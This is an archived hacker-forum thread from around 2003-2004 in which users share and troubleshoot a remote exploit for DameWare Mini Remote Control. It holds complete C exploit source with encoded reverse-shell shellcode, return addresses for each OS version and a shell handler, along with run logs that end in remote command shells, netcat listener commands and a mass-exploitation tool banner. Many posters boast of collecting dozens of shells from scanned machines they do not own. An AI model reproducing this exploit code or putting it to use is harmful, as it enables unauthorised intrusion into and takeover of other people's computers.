Dameware Mini Remote Control V3.73 Remote Exploit

Full Version: Dameware Mini Remote Control V3.73 Remote Exploit

GovernmentSecurity.org > The Archives > Exploit Articles

Pages: 1, 2, 3, 4

extreme

Dec 24 2003, 11:03 PM

Is there any tool with which we could scan this port and get some banner in response so we can know what version of dameware it is...

WTF. I get
[+] connecting to IP
error: wrong data recieved

Have anyone else gotten this error??? I get it allways..

DaywalkerX

Dec 25 2003, 01:16 AM

why not win2000,i found so many win2000 server with dameware

btw n02 after real server

but the most machines i found have av... and routed :/

GhostCow

Dec 25 2003, 10:19 AM

great stuff, it works like a charm

psycho-lvlantis

Dec 26 2003, 11:37 AM

very good stuff man, have to try it

X-FloppY

Dec 26 2003, 12:52 PM

Auto hacker \: i'll try to build one

Hexboy

Dec 26 2003, 01:30 PM

Interesting code. Software these days...

Axl

Dec 27 2003, 12:59 AM

QUOTE (UnDeRTaKeR @ Dec 21 2003, 09:36 PM)

well i dont have complaints... it all worked perfect for me...
i got something like 20 shells from that nice exploit

ack mine used to work and then when i redownloaded nothing works i do a nc -l -vv -p 15 then i go DameWeird *.*.*.* *.*.*.* 15 tells me shell should be arrived at *.*.*.*:15 and it never does.

LiQuid

Dec 27 2003, 03:46 AM

QUOTE (QuantumTopology @ Dec 27 2003, 12:59 AM)

QUOTE (UnDeRTaKeR @ Dec 21 2003, 09:36 PM)

well i dont have complaints... it all worked perfect for me...
i got something like 20 shells from that nice exploit

ack mine used to work and then when i redownloaded nothing works i do a nc -l -vv -p 15 then i go DameWeird *.*.*.* *.*.*.* 15 tells me shell should be arrived at *.*.*.*:15 and it never does.

Maybe the Server is firewalled?

Axl

Dec 27 2003, 07:57 AM

QUOTE (LiQuid @ Dec 27 2003, 03:46 AM)

QUOTE (QuantumTopology @ Dec 27 2003, 12:59 AM)

QUOTE (UnDeRTaKeR @ Dec 21 2003, 09:36 PM)

well i dont have complaints... it all worked perfect for me...
i got something like 20 shells from that nice exploit

ack mine used to work and then when i redownloaded nothing works i do a nc -l -vv -p 15 then i go DameWeird *.*.*.* *.*.*.* 15 tells me shell should be arrived at *.*.*.*:15 and it never does.

Maybe the Server is firewalled?

Hmm... i don't know it used to work but lately they haven't been even when i use say port 6129

Alien

Dec 27 2003, 08:08 AM

this exploit is great i scaning 5 min. i got 30 shells :]
thx for share

Axl

Dec 27 2003, 08:29 AM

QUOTE (Alien @ Dec 27 2003, 08:08 AM)

this exploit is great i scaning 5 min. i got 30 shells :]
thx for share

I want shells again it's upsetting me.

klassik

Dec 27 2003, 09:25 AM

Maybe you should go buy one? HEEHEE.

Nice exploit.

TmZ

Dec 27 2003, 09:31 AM

exploit worx fine if u cant get it to work youre really doing something wrong cuz its hell easy but they exploit is dying pretty fast so dont expect to get much shells anymore...

GreEtZ
TmZ

Axl

Dec 27 2003, 10:20 AM

QUOTE (klassik @ Dec 27 2003, 09:25 AM)

Maybe you should go buy one? HEEHEE.

Nice exploit.

Shutup klassik, you are worthless.... making me scan for the lame exploit and make the automatic installing packs damn you bastard hahah. lol l8r dude. and TmZ you are stupid telling me i'm doing something wrong because i'm not. Well i'm gonna say it's something with my windows install cause i tried running netcat on a bot of mine and it worked...

dozolax01

Dec 29 2003, 05:46 PM

Yea...I found that the first time that I used the exploit it worked fine, but it seems lately that after I apply the exploit, I never receive a shell. I'm not sure why but it is a good exploit.

Feanor

Dec 29 2003, 05:58 PM

THis exploit worked for me, but not lots of vulnerable comps for me...

Hellraiseruk

Dec 29 2003, 06:25 PM

can't someone makes this prog remote friendly lol

everytime i go to dmz mode and then try this it works for abit then screws my connection then i have to reset my router and dmz mode is off so back where i started

andi tryed that nc but still my god dam router blocks it lol

l0wkey

Dec 29 2003, 08:54 PM

I havn't been able to see ANY vuln hosts. Must be dying off quick.

tazthedev

Dec 29 2003, 11:27 PM

IM IN !!!

IT WORKS !!

- Versions vulnerable: <= DWRCS 3.72.0.0
- Tested on: DWRCS ver: 3.72.0.0 Win2k Pro SP3 & WinXP Pro S

[*] Target IP: xxx.xxx.xxx.xxx Port: 6129
[*] Local IP: xxx.xxx.xxx.xxx Listening Port: 4821

[*] Initializing sockets... [ OK ]
[*] Binding to local port: 4821... [ OK ]
[*] Setting up a listener... [ OK ]
[*] Connecting to xxx.xxx.xxx.xxx:6129... [ OK ]

packets_recv = 4096

OS Info : WIN2000 [ver 5.0.2195]
SP String : Service Pack 4

EIP: 0x717564b8 (comctl32.dll)

[*] Constructing packet for WIN 2000 SP: 4... [ OK ]
[*] Packet injected!
[*] Connection request accepted: xxx.xxx.xxx.xxx:1071
[*] Dropping to shell...

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

rush

Dec 30 2003, 02:03 PM

Damned people, many people in here just want to hack to show off or what?
Suc6 to the real hackers!

Jimbras

Dec 30 2003, 04:01 PM

xi, im getting tired.

always getting .... error: connection refused

zero-maitimax

Dec 30 2003, 04:32 PM

QUOTE (rush @ Dec 30 2003, 02:03 PM)

Damned people, many people in here just want to hack to show off or what?
Suc6 to the real hackers!

i don't think they show off..

they only let us see that the exploit indeed works and not justa a public version with bugs. and the program doesn't work..

Feanor

Dec 30 2003, 05:01 PM

QUOTE (Jimbras @ Dec 30 2003, 04:01 PM)

xi, im getting tired.

always getting .... error: connection refused

It's just that there aren't many vulnerable servers.

ST.

Dec 30 2003, 09:43 PM

if u can't compile something, just go to your victim and ask him "hey I want to see some files in your computer", i sure he will show you

zero-maitimax

Dec 31 2003, 12:17 AM

QUOTE (ST. @ Dec 30 2003, 09:43 PM)

if u can't compile something, just go to your victim and ask him "hey I want to see some files in your computer", i sure he will show you

i don't wanne start a flameware but i think we aren't stupid so even the victum isn't stupid...

tstngry

Dec 31 2003, 08:24 AM

I am having trouble compiling the exploit. i use dev c++, and when i do it it says there way a whole buch or errors. Do i need to choose some option based on what the code was written in or do i need a didfferent prog. If so what one. Thnx in advance!

QuadMedic

Dec 31 2003, 12:29 PM

this sploit worked gr8 thanx to the compilers ....... but it is dying fast now

headbanger

Dec 31 2003, 08:17 PM

great exploit, it works great! thans dude

tstngry

Jan 1 2004, 05:28 AM

May i just ask what program you guys used to compile this. I tried bloodshed c++, but i get errors. I qwould really like to know what program to use. BTW i understand c++, aand am not a script kiddie! THNX

Cow|

Jan 3 2004, 12:24 PM

For all the peppes who couldn't compile it here you can find a good version h**p://www.security.nnov.ru/files/dmware.rar

rush

Jan 3 2004, 01:35 PM

Cow| just try that version it wont work.
There arent good public xploits of this one, so far as i know..

Cow|

Jan 3 2004, 02:06 PM

It works i got shells with it

when you are using a router you need to open a port for it example your return port = 70 then open port 70 on your router and that is it no netcat required for this 1

Gargamel

Jan 3 2004, 06:16 PM

@Cow
i have a router and i open my returnport, but i didnt get a shell, although i should get one (shell should be arrived at xxx:xx or so) and this over 30times.

but a friend could connect to my netcat over telnet without problems. any knwo what to do?

sry for my bad english

Lanig

Jan 3 2004, 06:54 PM

could be just bad luck...
even if its says that the shell should arrive theres a good chance it wont

BillyJawz

Jan 3 2004, 10:13 PM

Well that sploit still isnt running on my XP box (got to have some debug on it). Anyone did find good EIP return adresses in his favorite debugger?

Did find the one that works for Adik sploit (seems like metasploit adresses arnt up to date) -> jmp esp adresse in advapi32.dll. Works greet but hardcoded adresses suxxx.

Cya

Steffan

Jan 4 2004, 04:52 PM

found something on the web but I got now source/binary.. anybody go it here ??

I must have this one !!!

[+]-------------------------------------------------------------[+]
[+] Dameware Autoh4x0r V.0.7a 3.72.0.0 Exploit moded by M@steR [+]
[+] removed the l4m3-stuff from netninja + add UNI-RET [+]
[+]-------------------------------------------------------------[+]
[+] Initializing sockets...
[+] OS Info :
[+] WIN2000 [ver 5.0.2195] SP String :
[+] Constructing packet for WIN 2000 SP: 0...
[+] Connecting to 192.168.144.2:6129...
[+] Inject packet and shellcode ...
[+] Packet & shellcode injected!

>nc -v 192.168.144.2 9191
xxxxxx [192.168.144.2] 9191 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-1999 Microsoft Corp.

C:\>

[+]-------------------------------------------------------------[+]
[+] Dameware Autoh4x0r V.0.9a <3.72.0.0 Exploit moded by M@steR [+]
[+] removed the l4m3-stuff from netninja + add UNI-RET [+]
[+]-------------------------------------------------------------[+]
[-] Usage: dmware <Target> <TGTport> <IP> <Port> (default)
[-] or bindshell -> <Target> <TGTport> <options>
[-] -s bind a shell & connect to
[-] -a Autoh4x0r using requests.txt as cmd.file
[-] -b brute force RET-Address

BillyJawz

Jan 4 2004, 05:36 PM

Looks interesting indeed, havnt heard of any UNI RET yet...

F30R

Jan 4 2004, 09:09 PM

nice i search about the .c

if u have the files could u pm me

thks a lot

ara

Jan 5 2004, 05:06 AM

many thanks to kralor, a fine piece of work

thotho

Jan 5 2004, 06:27 AM

Great exploit thanks

cha0s

Jan 6 2004, 12:26 PM

works great

babbacool

Jan 7 2004, 01:05 PM

Thanks for this exploit I'm gonna test it...

Damn I'm a bit late for this one I hope that i'll get some shell...

Copkill

Jan 7 2004, 06:16 PM

yes is very late

Great exploit,i ´ve got many shell´s

Big Thx

BillyJawz

Jan 7 2004, 10:48 PM

Hi all,

here is a mix of Adik exploit and the one posted here...keeps the best of each (better sp management by Adik and no nc needed, better connections and error report by Crpt).
It uses same RET values, so nothing very new but i like it like that.

CODE

/*******************************************************************************
*
* DameWare Remote Control Server Stack Overflow Exploit
*
* Discovered by: wirepair
* Exploit by: Adik [ netmaniac (at) hotmail.KG ]
* Tweaked by: Alb@t0r
* Vulnerable Versions: <= 3.72.0.0
* Tested on: 3.72.0.0 Win2k SP3 & WinXp SP3
* Payload: Reverse Connect Shellcode, exits gracefully
* doesn't terminate remote process.
*
* [16/Dec/2003] Bishkek
*******************************************************************************/

#include <stdio.h>
#include <string.h>
#include <winsock.h>
//#include "netmaniac.h"
#pragma comment(lib,"ws2_32.lib")
#define ACCEPT_TIMEOUT 10
#define RECVTIMEOUT 15

#define PORT 6129
#define SIZEOF 4096
#define WINUSER "johny"
#define WINHOST "DTCi_home"
#define USERPROFILE_NAME "johnny moohre"
#define USERPROFILE_COMPANY "geek solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "your_domain"
#define CLIENT_VERSION "3.72.0.0"

#define ID_UNKNOWN 0
#define ID_WIN2K 1
#define ID_WINXP 2
#define ID_WIN2K3 3
#define ID_WINNT 4
#define VER "0.5"
//#include "dmware.rc"

/*******************************************************************************/
unsigned char send_buff[40] = {
0x30, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xC3, 0xF5, 0x28, 0x5C, 0x8F, 0xC2, 0x0D, 0x40,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00
};

unsigned char kyrgyz_rshell[] = { //418
0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
0xC9, 0x66, 0xB9, 0xa2, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
0xDD, 0x03, 0x64, 0x03, 0x7C, 0xEE, 0x09, 0x64, 0x08, 0x88, 0x60, 0xAE, 0x89, 0x88, 0x88, 0x01,
0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xA3, 0x89, 0x88, 0x88, 0x01,
0xCE, 0x64, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x64,
0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0x82, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x56, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0x72, 0x88, 0x88, 0x88,
0x01, 0xCE, 0x52, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x62, 0x88, 0x88, 0x88,
0x01, 0xCE, 0x5E, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x52, 0x88, 0x88, 0x88,
0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x42, 0x88, 0x88, 0x88,
0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x64, 0x71, 0x22, 0xE8, 0x60, 0x32, 0x88, 0x88, 0x88,
0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x22, 0x88, 0x88, 0x88,
0x01, 0xCE, 0x6A, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88,
0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03,
0x50, 0xE0, 0x48, 0x20, 0xB7, 0x89, 0xE0, 0x8A, 0x88, 0xAA, 0x99, 0x03, 0x44, 0xE2, 0x98, 0xD9,
0xDB, 0x77, 0xDE, 0x60, 0x0D, 0x48, 0xFD, 0xD2, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x5A,
0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75,
0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x76, 0xCC, 0xAC, 0xB6, 0x01, 0xD4, 0xAC,
0xC0, 0x01, 0xD4, 0xAC, 0xC4, 0x01, 0xD4, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9,
0xD9, 0xD9, 0x4E, 0xCC, 0xAC, 0x8B, 0x80, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x5A, 0xD9,
0x77, 0xDE, 0x52, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x56, 0x03, 0x40, 0xDB, 0x77,
0xDE, 0x6A, 0x77, 0xDE, 0x5E, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03,
0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4,
0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2,
0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48,
0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C,
0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55,
0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A,
0x8C, 0x88
};

/*******************************************************************************/
long gimmeip(char *hostname);
void cmdshell (int sock);

struct timeval tv;
fd_set fds;
//char recv_buff1[5000]="";
/***********************-( os jmp esp offsets )-********************************/
struct sp_levels
{
unsigned long eip;
char library[20];
};
/*************-[ offsets grabbed from www.metasploit.com ] remix by Alb@t0r *********************/
struct
{
//int sp;
//unsigned long eip;
char os_type[10];
struct sp_levels sp[7];

} target_os[]=
{
{
"UNKNOWN",{{0,""},{0,""},{0,""},{0,""},{0,""},{0,""},{0,""}}
},
{
"WIN 2000",
{{ 0x750362c3,"ws2_32.dll" },{ 0x75035173,"ws2_32.dll" },{ 0x717564B8,"comctl32.dll" },
{ 0x717564B8,"comctl32.dll" },{ 0x717564B8,"comctl32.dll" },{ 0,"" },{ 0,"" } } //sp3 OK 0x77dc6d03, sp4 OK 0x7c2ec68b
},

{
"WIN XP",
{ { 0x71ab7bfb,"ws2_32.dll" },{ 0x773AD507,"advapi32.dll" },{ 0,"" },
{ 0,"" },{ 0,"" },{ 0,"" },{ 0,"" } } //2 sp on winxp ,0x77e2d9d3, 0x773E19C3 chez moi (xp sp1 us)
},
{
"WIN 2003",
{{0x77db565c,"advapi32.dll"},{0,""},{0,""},{0,""},{0,""},{0,""},{0,""}}//SP 0??
},
{
"WIN NT4",
{ // only SP3 + SP 6 r filled in
{ 0x77777777,"unknown.dll" },{ 0x77777776,"unknown.dll" },{ 0x77777775,"unknown.dll" },
{ 0x77f326c6,"kernel32.dll" },{ 0x77777773,"unknown.dll" },{ 0x77777772,"unknown.dll" },
{ 0x77f9d463,"kernel32.dll" }
}//6 SP
}

};
/****************************************************************************/

int main(int argc,char *argv[])
{
WSADATA wsaData;
struct sockaddr_in targetTCP, localTCP, inAccTCP;
int sockTCP,s,localSockTCP,accSockTCP, acsz,switchon;
//unsigned char send_packet[4135]="";
char buffer[SIZEOF];
unsigned short local_port, target_port;
unsigned long local_ip, target_ip;
unsigned int os_sp=0;
int os_ver=0;
printf("\n...oO DameWare Remote Control Server Overflow Exploit Oo...\n");
printf("-( by Adik netmaniac[at]hotmail.KG )& tweaked by Alb@t0r -\n");
printf(" - Versions vulnerable: <= DWRCS 3.72.0.0\n");
if(argc < 3)
{

printf(" Usage: %s <TargetIP> <TargetPort> <YourIp> <YourPort>\n"
" eg: %s 10.0.0.1 10.0.0.2 21\n\n",argv[0],argv[0]);
return 1;
}

WSAStartup(0x0202, &wsaData);
target_port = PORT;

local_port = htons((unsigned short)atoi(argv[3]));
local_ip = inet_addr(argv[2]);
local_port ^= 0x8888;
local_ip ^= 0x88888888;

*(unsigned long *)&kyrgyz_rshell[194+27] = local_ip; //27 is size of un-XORer
*(unsigned short *)&kyrgyz_rshell[201+27] = local_port;

printf( "[*] Target IP:\t%s \tPort: %d\n"
"[*] Local IP:\t%s \tListening Port: %s\n\n",argv[1],PORT,argv[2],argv[3]);

target_ip=gimmeip(argv[1]);
memset(&targetTCP, 0, sizeof(targetTCP));
memset(&localTCP, 0, sizeof(localTCP));

targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = target_ip;
targetTCP.sin_port = htons(target_port);

localTCP.sin_family = AF_INET;
localTCP.sin_addr.s_addr = INADDR_ANY;
localTCP.sin_port = htons((unsigned short)atoi(argv[3]));

printf("[*] Initializing sockets...");

if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("\t\t\t[ FAILED ]\n Socket1 not initialized! Exiting...\n");
WSACleanup();
return 1;
}
if ((localSockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("\t\t\t[ FAILED ]\n Socket2 not initialized! Exiting...\n");
WSACleanup();
return 1;
}
printf("\t\t\t[ OK ]\n");

printf("[*] Binding to local port: %s...",argv[3]);

if(bind(localSockTCP,(struct sockaddr *)&localTCP,sizeof(localTCP)) !=0)
{
printf("\t\t[ FAILED ]\n Failed binding to port: %s! Exiting...\n",argv[3]);
WSACleanup();
return 1;
}

printf("\t\t[ OK ]\n");
printf("[*] Setting up a listener...");
if(listen(localSockTCP,1) != 0)
{
printf("\t\t\t[ FAILED ]\nFailed to listen on port: %s! Exiting...\n",argv[3]);
WSACleanup();
return 1;
}
printf("\t\t\t[ OK ]\n");

printf("[*] Connecting to %s:%d...",argv[1],PORT);

//START check

if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("\n[x] Connection to host failed! Exiting...\n");
WSACleanup();
exit(1);
}

switchon=1;
ioctlsocket(sockTCP,FIONBIO,&switchon);
tv.tv_sec = RECVTIMEOUT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sockTCP,&fds);

if((select(1,&fds,0,0,&tv))>0)
{
recv(sockTCP, buffer, sizeof(buffer),0);
}
else
{
printf("\n[x] Timeout! Doesn't appear to b a DMWRCS\n");
exit(1);
}
if(buffer[0]!=0x30||buffer[1]!=0x11)
{
printf("\n[x] error: wrong data received\r\n");
WSACleanup();
return 1;
}
switchon=0;
ioctlsocket(sockTCP,FIONBIO,&switchon);

if (send(sockTCP, send_buff, sizeof(send_buff),0) == -1)
{
printf("\n[x] Failed to inject packet! Exiting...\n");
WSACleanup();
return 1;
}

switchon=1;
ioctlsocket(sockTCP,FIONBIO,&switchon);
tv.tv_sec = RECVTIMEOUT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sockTCP,&fds);

memset(buffer,0,SIZEOF);
if((select(sockTCP+1,&fds,0,0,&tv))>0)
{
recv(sockTCP, buffer, sizeof(buffer),0);
//closesocket(sockTCP);
}
else
{
printf("\n[x] Timeout! Failed to receive packet! Exiting...\n");
WSACleanup();
return 1;
}

if(buffer[0]!=0x10||buffer[1]!=0x27)
{
printf("\n[x] error: wrong data received from server..\r\n");
WSACleanup();
return 1;
}

printf("\n OS Info : ");
if(buffer[8]==5 && buffer[12]==0)
{
printf("WIN2000 [ver 5.0.%d]\n SP String : %-1.20s\n",*(unsigned short *)&buffer[16],&buffer[24]);
os_sp = atoi(&buffer[37]);
//closesocket(sockTCP);
os_ver = ID_WIN2K;
}
else if(buffer[8]==5 && buffer[12]==1)
{
printf("WINXP [ver 5.1.%d]\n SP String : %-1.20s\n",*(unsigned short *)&buffer[16],&buffer[24]);
os_sp = atoi(&buffer[37]);
//closesocket(sockTCP);
os_ver = ID_WINXP;
}
else if(buffer[8]==5 && buffer[12]==2)
{
printf("WIN2003 [ver 5.2.%d]\n SP String : %-1.20s\n",*(unsigned short *)&buffer[16],&buffer[24]);
os_sp = atoi(&buffer[37]);
//closesocket(sockTCP);
os_ver = ID_WIN2K3;
}
else if(buffer[8]==4)
{
printf("WINNT4\n SP String : %-1.20s\n",&buffer[24]);
os_sp = atoi(&buffer[37]);
//closesocket(sockTCP);
os_ver = ID_WINNT;
}
else
{
printf("UNKNOWN: ");
printf("Data received looks like %d.%d.%d %-1.20s\n", *(unsigned short *)&buffer[8],*(unsigned short *)&buffer[12],*(unsigned short *)&buffer[16], &buffer[24]);
//closesocket(sockTCP);
os_sp = 7;
os_ver = ID_UNKNOWN;
}

//End Check

if (!target_os[os_ver].sp[os_sp].eip)
{
printf("[ FAILED ] Dont know that offset yet, exiting...\n");
WSACleanup();
return 1;
}
printf("\nEIP: 0x%x (%s)\n\n",target_os[os_ver].sp[os_sp].eip,target_os[os_ver].sp[os_sp].library);
if (target_os[os_ver].os_type== ID_UNKNOWN)
{
printf("[ FAILED ] Failed to identify WIN version \n");
WSACleanup();
return 1;
}
printf("[*] Constructing packet for %s SP: %d...",target_os[os_ver].os_type,os_sp);
//memcpy(buffer,"\x10\x27",2);
//memcpy(send_packet+500,"neTmaNiac",strlen("netmaniac"));
memset(&buffer[2],0,SIZEOF-2);
strcpy(&buffer[175],WINUSER);
memset(&buffer[416],0x90,180);

*(unsigned long*)&buffer[516] = target_os[os_ver].sp[os_sp].eip;

memcpy(&buffer[520],kyrgyz_rshell,strlen(kyrgyz_rshell));
strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
strcpy(&buffer[2795],CLIENT_VERSION);

printf("\t[ OK ]\n");

switchon=0;
ioctlsocket(sockTCP,FIONBIO,&switchon);

if (send(sockTCP, buffer, sizeof(buffer),0) == -1)
{
printf("[x] Failed to inject packet! Exiting...\n");
WSACleanup();
return 1;
}

switchon=1;
ioctlsocket(sockTCP,FIONBIO,&switchon);
tv.tv_sec = RECVTIMEOUT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sockTCP,&fds);

memset(buffer,0,SIZEOF);

if((select(sockTCP+1,&fds,0,0,&tv))>0)
{
recv(sockTCP, buffer, sizeof(buffer),0);
}
else
{
printf("\n[x] Timeout! Failed to receive packet! Exiting...\n");
WSACleanup();
return 1;
}

printf("[*] Packet injected!\n");
closesocket(sockTCP);

if(buffer[0]!=0x32||buffer[1]!=0x11)
{
printf("[x] Patched ?\r\n");
//return -1;
}

printf("[*] Waiting for incoming connection...\r");

switchon=1;
ioctlsocket(localSockTCP,FIONBIO,&switchon);
tv.tv_sec = ACCEPT_TIMEOUT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(localSockTCP,&fds);

if((select(1,&fds,0,0,&tv))>0)
{
acsz = sizeof(inAccTCP);
accSockTCP = accept(localSockTCP,(struct sockaddr *)&inAccTCP, &acsz);
printf("[*] Connection request accepted: %s:%d\n", inet_ntoa(inAccTCP.sin_addr), (int)ntohs(inAccTCP.sin_port));
printf("[*] Dropping to shell...\n\n");
cmdshell(accSockTCP);
}
else
{
printf("\n[x] Exploit appears to have failed!\n");
WSACleanup();
}

return 0;
}

long gimmeip(char *hostname)
{
struct hostent *he;
long ipaddr;

if ((ipaddr = inet_addr(hostname)) < 0)
{
if ((he = gethostbyname(hostname)) == NULL)
{
printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
WSACleanup();
exit(1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
/ ********************************************************************************
*/
void cmdshell (int sock)
{
struct timeval tv;
int length;
unsigned long o[2];
char buffer[1000];

tv.tv_sec = 1;
tv.tv_usec = 0;

while (1)
{
o[0] = 1;
o[1] = sock;

length = select (0, (fd_set *)&o, NULL, NULL, &tv);
if(length == 1)
{
length = recv (sock, buffer, sizeof (buffer), 0);
if (length <= 0)
{
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
length = write (1, buffer, length);
if (length <= 0)
{
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
}
else
{
length = read (0, buffer, sizeof (buffer));
if (length <= 0)
{
printf("[x] Connection closed.\n");
WSACleanup();
return;
}
length = send(sock, buffer, length, 0);
if (length <= 0)
{
printf("[x] Connection closed.\n");
WSACleanup();
return;
}
}
}

}
/ ********************************************************************************
*/

Feel free to make comments

Cya

dmg

Jan 8 2004, 06:48 PM

Thanx mate!! Compiles cleanly here

Jimbras

Jan 9 2004, 01:13 AM

I get some errors.

Can you please post it compiled .

Thanks

vnet576

Jan 9 2004, 01:24 AM

QUOTE (Jimbras @ Jan 8 2004, 08:13 PM)

I get some errors.

Can you please post it compiled .

Thanks

Us compiling it for you will only be a quick fix..it will not teach you how to compile you're own exploits. Now what errors did you get since it compiled for me ok.

Xxplozive

Jan 9 2004, 01:55 AM

Its a very nice xploit. i've got many fast shells

zarp

Jan 9 2004, 01:21 PM

yes it appear nice this one

Thx

mmyumu

Jan 9 2004, 03:38 PM

Thanks for this exploit it seems to be nice

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.